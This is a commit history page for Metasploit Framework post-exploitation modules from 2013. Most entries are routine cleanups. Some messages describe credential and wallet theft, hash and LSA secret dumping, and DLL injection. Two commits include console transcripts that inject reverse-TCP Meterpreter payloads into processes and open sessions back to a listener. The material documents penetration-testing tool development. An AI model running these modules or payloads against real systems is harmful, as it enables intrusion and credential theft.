Commit Graph

1755 Commits (a0be142b336ce85ead1a5f4264debd2130015355)

Author SHA1 Message Date
Tod Beardsley 5e0c7e4741
DRY up bitcoin_jacker.rb, support Armory
Also, make the process killing optional.
2013-12-29 13:07:43 -06:00
TabAssassin 9384a466c1
Retab bitcoin_jacker.rb 2013-12-29 10:59:15 -06:00
Tod Beardsley 6fcd12e36c Refactor for clearer syntax and variables
This was done on a barely configured Windows machine, so mind the tabs.
2013-12-29 10:15:48 -06:00
Tod Beardsley ef73ca537f First, clean up the original a little 2013-12-28 18:57:04 -06:00
sinn3r f2335b5145
Land #2792 - SSO/Mimikatz module overwrites password with N/A 2013-12-27 17:25:44 -06:00
Tod Beardsley d6a63433a6
Space at EOL 2013-12-26 10:37:18 -06:00
sinn3r 78db7429d0 Turns out the latest Safari is still vulnerable.
The version check is currently disabled because turns out the latest
Safari (6.1.1) is still vulnerable - I can still loot it in plain
text.
2013-12-24 19:27:45 -06:00
sinn3r a26e12b746 Updates descriiption and improves regex for safari_lastsession.rb
This updates two things for the safari_lastsession post module:

1. The description is updated: More information is added to describe
how Safari would end up storing the Gmail credential in the last
session state, and what it means to you as an attacker.

2. Regex update for the domain to search for: Before the module starts
extract the session data, it needs to know which domain to extract from.
Originally I only added mail.google.com, but turns out the sensitive info
can be found in accounts.google.com, so I added that one.
2013-12-24 14:00:55 -06:00
Meatballs bf8c0b10fa
Dont store n/a creds 2013-12-21 09:04:02 +00:00
jvazquez-r7 a043d384d4
Land #2738, @jiuweigui update to enum_prefetch 2013-12-20 10:26:54 -06:00
Meatballs 71ba78c2f0
Direct to correct module 2013-12-20 16:09:57 +00:00
Meatballs f99a5b8b47
Update for extapi 2013-12-20 13:18:01 +00:00
Meatballs 4ca25d5d89
Merge branch 'enum_ad_perf' into enum_ad_users 2013-12-20 12:54:24 +00:00
Meatballs 62ef810e7c
Use Extapi if available 2013-12-19 18:18:47 +00:00
Meatballs 737154c2fe
Update to use extapi 2013-12-19 16:46:09 +00:00
William Vu 9434d60021 Remove EOL whitespace from OS X hashdump 2013-12-19 10:39:49 -06:00
Meatballs 3ef1c0ecd6 Merge remote-tracking branch 'upstream/master' into enum_ad_perf 2013-12-19 14:25:07 +00:00
Meatballs 244cf3b3f6 Merge remote-tracking branch 'upstream/pr/2736' into enum_ad_perf 2013-12-19 13:59:57 +00:00
OJ a77daa0902 Fix download_exec to better handle spaces
It was just wrong. Now it actually works.
2013-12-19 13:00:26 +10:00
OJ 9fb081cb2d Add getenvs, update getenv, change extract_path use
Stacks of modules were using `extract_path` where it wasn't really semantically correct
because this was the only way to expand environment variables. This commit fixes that
up a bit.

Also, I changed the existing `getenv` function in `stdapi` to `getenvs`, and had it
support the splat operator. I added a `getenv` function which is used just for a
single variable and uses `getenvs` behind the scenes.

The meterpreter console `getenv` command now uses `getenvs`
2013-12-19 11:54:34 +10:00
sinn3r 8dfa2e6963
Land #2734 - OSX Gather Autologin Password as Root 2013-12-18 15:37:45 -06:00
sinn3r 5011c4d928 The "unless" Ruby nazi is in town 2013-12-18 15:28:31 -06:00
sinn3r 5ec3d5f3f6 Raise specific exceptions 2013-12-18 15:27:49 -06:00
Tod Beardsley c4b8178663
Correct camelCase of YouTube 2013-12-18 14:06:45 -06:00
Meatballs 3e54379b0e
Merge remote-tracking branch 'upstream/master' into wmic_post
Conflicts:
	lib/msf/core/post/windows.rb
2013-12-18 13:40:54 +00:00
sinn3r 10e16673a7 There must be read_file 2013-12-17 16:42:49 -06:00
sinn3r 21feae0bbc Make sure the file path is readable when it's ~/ 2013-12-17 16:38:58 -06:00
jvazquez-r7 7ec96876d9 Delete unnecessary includes 2013-12-17 15:57:09 -06:00
sinn3r 374ef71c12 Favor read_file instead 2013-12-17 15:34:52 -06:00
sinn3r ea6ba2b159 Add post module to get LastSession.plist
LastSession.plist sometimes contains sensitive information such as
usernames and passwords. It'd be nice to keep this in loot.
2013-12-17 13:07:30 -06:00
bmerinofe 89ffafad0e Changes to Service mixin 2013-12-17 13:10:27 +01:00
Tod Beardsley 040619c373
Minor description changes
No code changes (one comment made on play_youtube to suggest xdg-open
rather than firefox for linux targets).
2013-12-16 14:57:33 -06:00
jiuweigui 446db78818 Minor fix to gather_pf_info function 2013-12-16 21:33:07 +02:00
Meatballs b532987b8f
Re-add file out to wmic_command 2013-12-14 20:58:33 +00:00
Meatballs 7902f061ca
Final tidyup 2013-12-14 20:18:14 +00:00
Meatballs 04496a539c
Fix up local wmi exploit. 2013-12-14 20:05:51 +00:00
Meatballs 4224c016f4
Use WaitForSingleObject instead of loop 2013-12-14 18:42:31 +00:00
Meatballs 12afdd2cbb
Get and parse result from clipboard 2013-12-14 18:30:43 +00:00
Meatballs 3ad1e57f8d
Merge remote-tracking branch 'upstream/master' into wmic_post 2013-12-14 16:25:31 +00:00
bmerinofe f185c2deb1 added driver_loaded post meterpreter module 2013-12-14 00:07:04 +01:00
jvazquez-r7 7ab1369515
Land #2757, @wchen-r7's youtube post module 2013-12-12 16:36:42 -06:00
sinn3r 1bcaffccc8 Make sure profile name is random 2013-12-12 16:19:06 -06:00
sinn3r 036955983d Add support for Linux, thanks @jvennix-r7! 2013-12-12 16:12:36 -06:00
sinn3r 7d12ced66e Remove unnecessary require statements 2013-12-12 13:49:54 -06:00
sinn3r ce18ac4c62 fix comment 2013-12-12 12:49:46 -06:00
sinn3r 97e9daaa6a Change title 2013-12-12 12:42:07 -06:00
sinn3r de087d134a Account for error 2013-12-12 12:41:05 -06:00
sinn3r 7ff0f4a2e7 move to multi for real 2013-12-12 12:35:58 -06:00
sinn3r 4d1a07bdfc Move to multi 2013-12-12 12:34:45 -06:00
sinn3r 17b5d3c375 Add support for OSX 2013-12-12 12:33:59 -06:00
sinn3r 509ebddb87 Turns out there's -k, that's easier 2013-12-12 10:09:02 -06:00
sinn3r 54a5dfc344 This module allows you to broadcast a Youtube video on compromised machines 2013-12-12 02:34:00 -06:00
jvazquez-r7 374e40c815 Add requires 2013-12-11 12:05:12 -06:00
jvazquez-r7 572ddacdd6 Clean ie_proxypac 2013-12-11 11:49:29 -06:00
jvazquez-r7 7589b4c4d5 Merge for retab 2013-12-11 11:47:30 -06:00
bmerinofe e6eeb4a26d rescue RuntimeError added 2013-12-11 03:00:13 +01:00
jvazquez-r7 2ef3caa9d7
Land #2735, @jvennix-r7 support of 10.8+ on osx hashdump 2013-12-10 09:39:04 -06:00
Tod Beardsley 1b3bc878f8
Unscrew the author name 2013-12-09 21:32:03 -06:00
bmerinofe e9edce10ac Applying changes 2013-12-10 03:07:40 +01:00
Joe Vennix 06b651de7b Revert read_file to cat so that pipe will work. 2013-12-09 19:30:08 -06:00
Joe Vennix 450716c788 Remove meterpreter support from osx autologin gather. 2013-12-09 19:19:20 -06:00
Tod Beardsley e737b136cc
Minor grammar/caps fixup for release 2013-12-09 14:01:27 -06:00
Joe Vennix 6d1d45c691 Add user param to nt_hash call. 2013-12-09 10:28:06 -06:00
sinn3r 9c5991980a
Land #2733 - Disable meterpreter support because they're not stable 2013-12-09 02:50:36 -06:00
Joe Vennix dea35252af Kill unused method. 2013-12-08 14:35:49 -06:00
Joe Vennix df76651834 Make sure loot is named correctly. 2013-12-08 14:31:18 -06:00
Joe Vennix 7f3ab14179 Make pipe part of /bin/bash cmd. 2013-12-08 14:27:28 -06:00
Joe Vennix 9b34a8f1ad Supports 10.3 2013-12-08 14:26:16 -06:00
Joe Vennix f981a04918 Fix MATCHUSER bug.
* Also add spacing and indentation for better readability.
* Refactors grab_shadow_blob method.
2013-12-08 14:21:48 -06:00
jiuweigui 2a0b503f06 Minor fix 2013-12-08 18:17:22 +02:00
Joe Vennix eacab1b2ad Fix description, kill dead constant. 2013-12-07 22:28:16 -06:00
Joe Vennix 969f45fd32 Refactor OSX hashdump post module.
* Adds support for MATCHUSER regex option
* Adds support for OSX 10.8 and 10.9 hashes (PBKDF2)
* DRYs up a bunch of older code, adds lots of helper fns
* Ends up shaving off ~20 lines
2013-12-07 22:22:23 -06:00
Joe Vennix 3066e62711 Fix typo, fix no-autologin users bug. 2013-12-07 19:27:36 -06:00
Joe Vennix 4cb788b9de Adds osx autologin password post module. 2013-12-07 19:01:35 -06:00
Joe Vennix c6eac67ab5 Kill meterpreter support for osx media modules.
There is some bug that I haven't been able to track down that causes the
osx call to run the event queue to just hang on latest OSX + Java/python
meterpreter. I tried rewriting these modules using OSX's new Media API,
but I run into the same problem. Until I find a solution, we should mark
these shell-only.
2013-12-07 17:46:26 -06:00
bmerinofe 5e5fd6b01a Unless replaced 2013-12-06 15:01:35 +01:00
Meatballs 3aebe968bb
Land #2721 Reflective DLL Mixin
Adds support to load a dll and identify the ReflectiveLoader offset.
Adds support to inject dll into process and execute it.

Updates kitrap0d, ppr_flatten_rec, reflective_dll_inject modules and
payload modules to use above features.
2013-12-06 12:26:51 +00:00
OJ 73d3ea699f Remove the last redundant error check 2013-12-06 09:32:21 +10:00
OJ 2cb991cace Shuffle RDI stuff into more appropriate structure
Now broken into two modules, one for loading RDI DLLs off disk and
finding the loader function offset, and another for doing the process
specific stuff of loading into the target.
2013-12-06 08:25:24 +10:00
William Vu 79e23a1e13
Land #2675, @JonValt's forensics/browser_history
Great job!
2013-12-05 09:35:53 -06:00
Joshua Harper PI GCFE GCFA GSEC cd5172384f Rename gather_browser_history.rb to browser_history.rb 2013-12-05 08:43:19 -06:00
Joshua Harper 3957bbc710 capitalization ("skype")
(https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r8120307)

Removed some Chrome artifacts and renamed one to reflect "Archived History."  
(https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r8120314)
((Will include other doxxes in another module.))
2013-12-05 08:33:47 -06:00
jiuweigui 717f45ac09 Minor modification 2013-12-05 09:07:28 +02:00
jiuweigui 902d48efab Delete debug prints 2013-12-05 09:03:42 +02:00
jiuweigui 492cd1ca07 Modifications how info is collected from pf files. 2013-12-05 08:56:26 +02:00
OJ b936831125 Renamed the mixin module 2013-12-05 08:13:54 +10:00
bmerinofe 1833b6fd95 More changes. No admin privs check 2013-12-04 14:51:46 +01:00
OJ 7e8db8662e Update name of the mixin
Changed `RdiMixin` to `ReflectiveDLLInjection`.
2013-12-04 22:18:29 +10:00
bmerinofe 05479b2a19 Added new options 2013-12-04 11:45:37 +01:00
OJ f79af4c30e Add RDI mixin module
MSF was starting to see more modules using RDI to load binaries into
remote processes, so it made sense to create a mixin which contained
the functionality that was being used in various locations.

This commit contains the new mixin, and adjustments to all the existing
exploits and modules which use RDI.
2013-12-04 16:09:41 +10:00
bmerinofe 5c266adfd7 added ie_proxypac post meterpreter module 2013-12-03 22:23:09 +01:00
sinn3r 19293d89dd
Land #2704 - rm script launcher and fix file_exists? 2013-12-02 15:05:01 -06:00
Peter Toth 44e37f1b98 Improved meterpreter compatibility 2013-12-02 21:43:58 +01:00
Joshua Harper d1dd7c291b cosmetic (indentation)
https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r7977962
2013-12-02 13:16:48 -06:00
jvazquez-r7 7e379376dc
Land #2635, @peto01 and @jvennix-r7's osx post module to manage volumes 2013-12-02 09:22:23 -06:00
jvazquez-r7 cc2b7950bf Do minor cleanup to mount_share 2013-12-02 09:21:36 -06:00
joev 040a629f34 Kill meterpreter support.
* Meterpreter seems to fall over on the cmd escaping, and dies if you
try to pass it an array of args (python/java meterpreter on various versions
of osx).
2013-12-01 20:17:43 -06:00
joev 2de9a4f3c1 Add support for 10.5 shares. 2013-12-01 20:13:54 -06:00
Joshua Harper cdf6ffa70d Complete refactor with lots of help from @kernelsmith and @OJ. Thank you guys so much. 2013-11-27 21:02:48 -06:00
sinn3r a8af050c16 Update post module Apache Tomcat description
This module's description needs to be more descriptive, otherwise
you kind of have to pull the source code to see what it actually
does for you.
2013-11-27 19:21:27 -06:00
Joshua Harper 1c17383eff removed return file_loc
removed extra space
2013-11-27 15:04:31 -06:00
Joshua Harper 036cd8c5ad couple cosmetic changes per wvu-r7 2013-11-27 14:44:39 -06:00
Peter Toth 95a98529c4 Removed script launcher wrapper and fixed the file_exists so that the module now detects input 2013-11-27 21:38:20 +01:00
joev 6561f149a8 DRY up URL_REGEX constant. 2013-11-27 06:16:25 -06:00
joev b0416b802d Change the Recent shares implementation.
* Allows us to see protocol of Recent Shares
* Parses protocol from file share URL
2013-11-27 06:08:48 -06:00
joev e876155e1a More tweaks to mount_share.
* Adds some docs to some of the methods to further distinguish
the separate sets of shares.
2013-11-27 05:45:46 -06:00
joev 485e38ebca Some code tweaks to post/osx/mount_share.
* Make PROTOCOL an Enum
* Move path override options to advanced section
* More Enumerable rework
* Move one-off regexes back to inline, pull out protocol list
2013-11-27 05:22:12 -06:00
William Vu f3e71c2c9d Be more specific
Perl!
2013-11-27 01:03:41 -06:00
William Vu b202b98a42 Anchor the scheme 2013-11-27 00:57:45 -06:00
William Vu e8da97aa17 Fix extraneous use of which and cmdsub
I don't even.
2013-11-27 00:43:07 -06:00
William Vu 288476441f Fix improper use of expand_path
I don't even.
2013-11-27 00:42:09 -06:00
jonvalt 9dbeb55b9a removed single quotes from inside %q{} on line 22 per https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r7913331
removed empty advanced options registration on line 28 per https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r7913342
2013-11-26 10:29:38 -06:00
sinn3r 48578c3bc0 Update description about suitable targets
The same technique work for Microsoft Office 2013 as well. Tested.
2013-11-24 23:02:37 -06:00
jvazquez-r7 49441875f3
Land #2683, @wchen-r7's module name consistency fix 2013-11-24 16:51:22 -06:00
Meatballs b015dd4f1c
Land #2532 Enum LSA Secrets
With refactoring of common methods from smart_hashdump, hashdump,
cachedump to Windows::Post::Privs
2013-11-24 18:09:33 +00:00
Meatballs 7f048bcd2c
Merge HOSTFILE and CSV input
And remember to uniq the array.
2013-11-24 15:28:44 +00:00
Meatballs 511d176128
Add hostfile resolution 2013-11-24 15:20:04 +00:00
Meatballs 23a267b65c
Undo move 2013-11-24 15:06:36 +00:00
Meatballs 23ac7ad75a
Merge remote-tracking branch 'upstream/master' into getaddrinfo 2013-11-24 15:00:00 +00:00
Meatballs c03c33f6f6
Initial commit 2013-11-24 14:58:18 +00:00
sinn3r ce8b63f240 Update module name to stay consistent
This module is under the windows/gather, so must be named the same
way like the rest.
2013-11-24 01:01:29 -06:00
Meatballs 72822cfa2d
Save egypt from eol comments 2013-11-23 22:11:46 +00:00
Meatballs 646f977888
Use post mixin 2013-11-23 22:07:07 +00:00
Meatballs 4d3e061e43
Merge branch 'enum_ad_perf' into enum_ad_users 2013-11-23 22:05:15 +00:00
Meatballs 699d13eef1
Share the wealth
Move LDAP methods to a Post mixin.
2013-11-23 21:42:09 +00:00
Meatballs 11f00cc50b
Backout small change 2013-11-23 21:23:25 +00:00
Meatballs 0c8fc657bb
Address @jlee-r7's comments 2013-11-23 19:42:33 +00:00
jonvalt b712c77413 capitalization 2013-11-22 14:37:54 -06:00
jonvalt 52a3b93f24 Hopefully final commit.
ALL issues mentioned by todb in https://github.com/rapid7/metasploit-framework/pull/2663/ have been fixed or erased.

Only exception is comment https://github.com/rapid7/metasploit-framework/pull/2663/#discussion_r7837036 which if omitted as recommended, breaks the module.
2013-11-22 14:17:20 -06:00
jonvalt 9addd37458 minor changes:
s/grab/gather/g
2013-11-22 14:03:54 -06:00
jonvalt b742ed13b9 junk commit 2013-11-22 12:38:06 -06:00
Peter Toth 4a6511311d Code improvements according to feedback 2013-11-22 15:35:45 +01:00
Peter Toth 3afa21c721 Added favorite and recent shares to the output 2013-11-21 23:55:24 +01:00
sinn3r b5fc0493a5
Land #2642 - Fix titles 2013-11-18 12:14:36 -06:00
jvazquez-r7 f6f0d81149
Land #2632, @peto01 OSX VPN Manager post module 2013-11-18 09:49:14 -06:00
jvazquez-r7 0a930ef6e1 Clean osx vpn post module 2013-11-18 09:47:52 -06:00
jiuweigui b2e7ff4587 Small change for filetime conversion 2013-11-17 22:26:30 +02:00
jiuweigui b73260b74c Add functionality to enum_prefetch post module 2013-11-17 22:10:55 +02:00
William Vu 2c485c509e Fix caps on module titles (first pass) 2013-11-15 00:03:42 -06:00
Peter Toth 7db42efdd4 Code restructure and more robust error handling 2013-11-14 13:44:49 +01:00
James Lee 5b96ad595f
Skip reg values with no secretes
Also update header comment to match new standard
2013-11-13 19:05:16 -06:00
James Lee cb10b4783b
Mark XP hashes as mscash for JtR to recognize 2013-11-13 19:04:16 -06:00
James Lee 0aef145f64 Merge remote-tracking branch 'upstream/master' into land-2532-enum-lsa 2013-11-13 18:11:21 -06:00
James Lee 8471f74b75
Refactor ivar to a more reasonable method
Also changes jtr output for cachedump to produce hashes that can be
auto-detected as mscash2 format for a better user experience.
2013-11-13 18:09:41 -06:00
James Lee 8bb72764ec
Rename credentials/lsa -> lsa_secrets
Secrets are not necessarily credentials
2013-11-13 15:23:15 -06:00
James Lee 16627c1bd3
Add spec for capture_lsa_key 2013-11-13 15:16:34 -06:00
jvazquez-r7 2b19490095 Fix Exception handling 2013-11-13 13:57:15 -06:00
jvazquez-r7 95f371a1a6 Move screen_capture to the capture folder 2013-11-13 13:41:11 -06:00
jvazquez-r7 f65e82523b Clean screen_capture 2013-11-13 13:40:41 -06:00
James Lee 3168359a82
Refactor lsa and add a spec for its crypto methods 2013-11-13 11:55:39 -06:00
Peter Toth 0c096c10fb Submitting first version for pull request 2013-11-13 17:03:38 +01:00
Peter Toth f5760d5e4c Removed unnecessary delay 2013-11-13 16:25:47 +01:00
Peter Toth c4a8bfb175 Tighter error handling 2013-11-13 16:19:38 +01:00
Peter Toth 78199409dd Changes according to feedback 2013-11-13 14:13:40 +01:00
Peter Toth 92da6760ef Modified module to use windows/screen_spy code 2013-11-13 13:30:20 +01:00
Peter Toth 3fdaf4de94 Work in progress 2013-11-13 13:11:27 +01:00
Peter Toth 76660b858c In progress 2013-11-13 12:32:49 +01:00
Peter Toth 049111cd94 In progress 2013-11-13 11:21:39 +01:00
Peter Toth d9c402c035 Fixed the module name 2013-11-13 08:57:50 +01:00
Peter Toth 2d9e8e09e6 Minor bugfix 2013-11-13 02:07:06 +01:00
Peter Toth 1fed50c96a General improvements according to feedback 2013-11-13 01:54:42 +01:00
Peter Toth 6e12553393 Changed option SNAP_FILETYPE to FILETYPE 2013-11-13 00:51:58 +01:00
Peter Toth 779cb48b76 General improvements addressing feedback 2013-11-13 00:42:00 +01:00
Peter Toth c5f21ef463 added osx vpn module 2013-11-12 12:47:33 +01:00
Peter Toth b722fee15c added OSX module screen_capture 2013-11-12 12:32:30 +01:00
Meatballs d9fa092962
Initial commit 2013-11-07 20:48:15 +00:00
Meatballs 6415666830 Merge remote-tracking branch 'upstream/master' into enum_ad_perf 2013-11-07 17:00:56 +00:00
scriptjunkie 7615264b17 Merge branch 'lanattacks_fix' of git://github.com/OJ/metasploit-framework into OJ-lanattacks_fix 2013-11-07 10:35:00 -06:00
James Lee faf6be4529
Missed an errant require
Wasn't even using it anyway
2013-11-05 14:00:55 -06:00
James Lee 9e30c58495 Blow away remnants of Local::Unix 2013-11-05 13:51:45 -06:00
OJ f62247e731 Fix comments, indenting and pxexploit module
Updated the comments and indentation so they're not blatantly wrong.

Adjusted the pxexploit module so that it doesn't break any more as
a result of the refactoring.
2013-11-05 06:35:50 +10:00
Tod Beardsley 4128aa8c08
Resplat and tabs 2013-10-28 14:03:15 -05:00
sinn3r a95425de08 Check dec instead 2013-10-25 10:47:41 -05:00
sinn3r 1d0a3aad70 [FixRM #8525] undefined method `+' for nil:NilClass in enum_ie
Looks like for some reason if CryptUnprotectData fails, the decrypt_reg()
method will return "". And when you unpack "", you produce an array of nils.
Since you cannot add something to nil, this should cause an
"undefined method `+' for nil:NilClass" error.

This will check if we get an array of nils, we jump to the next iteration.
2013-10-25 00:26:38 -05:00
sinn3r e1c4aef805
Land #1789 - Windows SSO Post Module 2013-10-22 15:48:15 -05:00
Rob Fuller e447aff0ec Fix misleading statement in Outlook post module
Since this module doesn't retrieve domain exchange information as it isn't stored there it shouldn't say that Outlook isn't installed at all.
2013-10-22 11:53:15 -04:00
sinn3r 72f3d4f86c
Land #2496 - Added ability to generate multiple payloads
Thx Dave!
2013-10-22 01:42:03 -05:00
sinn3r 57e39c2b2c
Land #2498 - multiple payload capabilities 2013-10-21 14:51:24 -05:00
sinn3r 03adb48d48 Resolve NoMethodError undefined method `empty?' for nil:NilClass
blank? should fix this.
2013-10-21 14:50:25 -05:00
sinn3r 4c14595525
Land #2535 - Use %PATH% for notepad 2013-10-21 13:14:44 -05:00
sinn3r 032da9be10
Land #2426 - make use of Msf::Config.data_directory 2013-10-21 13:07:33 -05:00
Norbert Szetei 9d6031acdb Reverting payload_inject because of x64 shellcode
Injecting x64 shellcode in a SYSWOW64 process spawn a 32 bit notepad, so
we revert the changes.
2013-10-18 09:51:18 +02:00
Norbert Szetei 563bf4e639 Fix bug #8502, used %PATH% for notepad invocation
We use system %PATH% for notepad executable instead of the absolute
path, because it caused a problem with the migrate script in a 64-bit
meterpreter session. By default the wordpad binary is not in the
%PATH%, so the condition in hp_nnm_ovbuildpath_textfile.rb was not
changed.
2013-10-17 15:41:12 +02:00
Rob Fuller 8f2ba68934 move decrypt_lsa and decrypt_secret to priv too 2013-10-17 00:04:21 -04:00
Rob Fuller 541d932d77 move decrypt_lsa to priv as well 2013-10-16 23:53:33 -04:00
Rob Fuller 60d8ee1434 move capture_lsa_key to priv 2013-10-16 23:45:28 -04:00
Rob Fuller 1a9fcf2cbb move convert_des_56_to_64 to priv 2013-10-16 23:39:07 -04:00
Rob Fuller 26d07c0689 add a needed -end 2013-10-16 23:35:14 -04:00
Rob Fuller b318e32487 removed duplicate code for capture_boot_key functions 2013-10-16 23:17:20 -04:00
Rob Fuller 8be21a7413 remove the insane amount of rescues 2013-10-16 22:58:14 -04:00
Rob Fuller 1a85bd22a8 move capture_boot_key to post win priv 2013-10-16 22:46:15 -04:00
Rob Fuller b223504980 clean up run code - remove catchall rescue 2013-10-16 22:22:45 -04:00
Rob Fuller ca88c071cf remove unneeded railgun call and make vprints out of commented puts 2013-10-16 22:20:21 -04:00
Rob Fuller f672e2075b get rid of ID and Version 2013-10-16 22:18:24 -04:00
Rob Fuller 2fbd7ea0ba msftidy up 2013-10-16 22:17:05 -04:00
Rob Fuller b42687151f convert from tabs to spaces 2013-10-16 22:14:55 -04:00
Rob Fuller c59bdbf52e move Rob Bathurst enum_lsa module in from the unstable cold 2013-10-16 22:10:22 -04:00
Tod Beardsley f0aedd932d
More stragglers 2013-10-16 16:29:55 -05:00
Tod Beardsley f57032636e
Straggler on a weird boilerplate format 2013-10-15 14:57:04 -05:00
Tod Beardsley 5d86ab4ab8
Catch mis-formatted bracket comments. 2013-10-15 14:52:12 -05:00
Tod Beardsley ed0b84b7f7
Another round of re-splatting. 2013-10-15 14:14:15 -05:00
Tod Beardsley c83262f4bd
Resplat another common boilerplate. 2013-10-15 14:07:48 -05:00
Tod Beardsley 23d058067a
Redo the boilerplate / splat
[SeeRM #8496]
2013-10-15 13:51:57 -05:00
Tod Beardsley 63e40f9fba
Release time fixes to modules
* Period at the end of a description.
  * Methods shouldn't be meth_name! unless the method is destructive.
  * "Setup" is a noun, "set up" is a verb.
  * Use the clunky post module naming convention.
2013-10-14 15:17:39 -05:00
Meatballs 378f403fab
Land #2453, Add stdapi_net_resolve_host(s) to Python Meterpreter.
Moves resolve_host post module to multi and depreciates Windows module.
Resolve will now return nil for failed lookups instead of an empty
string.
2013-10-10 20:13:06 +01:00
Meatballs 9ca9b4ab29
Merge branch 'master' into data_dir
Conflicts:
	lib/msf/core/auxiliary/jtr.rb
2013-10-10 19:55:26 +01:00
trustedsec d208ab9260 Added multiple payload capabilities
Added support to specify multiple payload delivery options.

msf post(payload_inject) > show options

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   2                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    XXXXXXXX                         yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS  #<Msf::OptInt:0x007f5c6439c6d8>  no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION  1                                yes       The session to run this module on.

msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > exploit

[*] Running module against XXXXXXXX
[*] Starting exploit multi handler
[*] Performing Architecture Check
[*] Started reverse handler on XXXXXXXX:4433 
[*] Starting the payload handler...
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (770048 bytes) to XXXXXXXX
[+] Successfully injected payload in to process: 884
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x00ba0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 884
[*] Post module execution completed
msf post(payload_inject) > [*] Meterpreter session 2 opened (XXXXXXXX:4433 -> XXXXXXXX:2962) at 2013-10-09 21:54:25 -0400

[*] Sending stage (770048 bytes) to XXXXXXXX

msf post(payload_inject) > [*] Meterpreter session 3 opened (XXXXXXXX:4433 -> XXXXXXXX:2963) at 2013-10-09 21:54:27 -0400
2013-10-09 22:01:11 -04:00
trustedsec bec239abf1 Added ability to generate multiple payloads - not just one
Ran into a pentest recently where I had a flaky meterpreter shell, had it launch multiple ones just to be safe. The amount datastore allows you to iterate through and spawn multiple sessions.

msf exploit(psexec) > use post/windows/manage/multi_meterpreter_inject 
msf post(multi_meterpreter_inject) > show options

Module options (post/windows/manage/multi_meterpreter_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   1                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start new multi/handler job on local box.
   IPLIST   XXXXXXXXX                        yes       List of semicolom separated IP list.
   LPORT    4444                             no        Port number for the payload LPORT variable.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Payload to inject in to process memory
   PIDLIST                                   no        List of semicolom separated PID list.
   SESSION                                   yes       The session to run this module on.

msf post(multi_meterpreter_inject) > set AMOUNT 5
AMOUNT => 5
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set SESSION 1
SESSION => 1
msf post(multi_meterpreter_inject) > exploit

[*] Running module against XXXXXXXXX
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5400
[*] Injecting meterpreter into process ID 5400
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5400
[*] Meterpreter session 2 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4991) at 2013-10-09 18:04:02 -0400

[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4136
[*] Injecting meterpreter into process ID 4136
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4136
[*] Meterpreter session 3 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4992) at 2013-10-09 18:04:08 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4108
[*] Injecting meterpreter into process ID 4108
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4108
[*] Meterpreter session 4 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4993) at 2013-10-09 18:04:13 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5788
[*] Injecting meterpreter into process ID 5788
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5788
[*] Meterpreter session 5 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4994) at 2013-10-09 18:04:19 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1408
[*] Injecting meterpreter into process ID 1408
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1408
[*] Meterpreter session 6 opened (XXXXXXXXX:4444 -> XXXXXXXXX:1029) at 2013-10-09 18:04:24 -0400
[*] Post module execution completed
msf post(multi_meterpreter_inject) >
2013-10-09 18:11:09 -04:00
Spencer McIntyre be139beb20 Remove windows from title of multi module. 2013-10-09 17:11:47 -04:00
Spencer McIntyre 6c382c8eb7 Return nil on error, and move the module to post/multi. 2013-10-09 16:52:53 -04:00
Tod Beardsley c2c6422078
Correct the name of "DynDNS" (not Dyn-DNS) 2013-10-09 09:56:07 -05:00
David Maloney 7d0cf73af7 Fix multi-meter_inject error msg
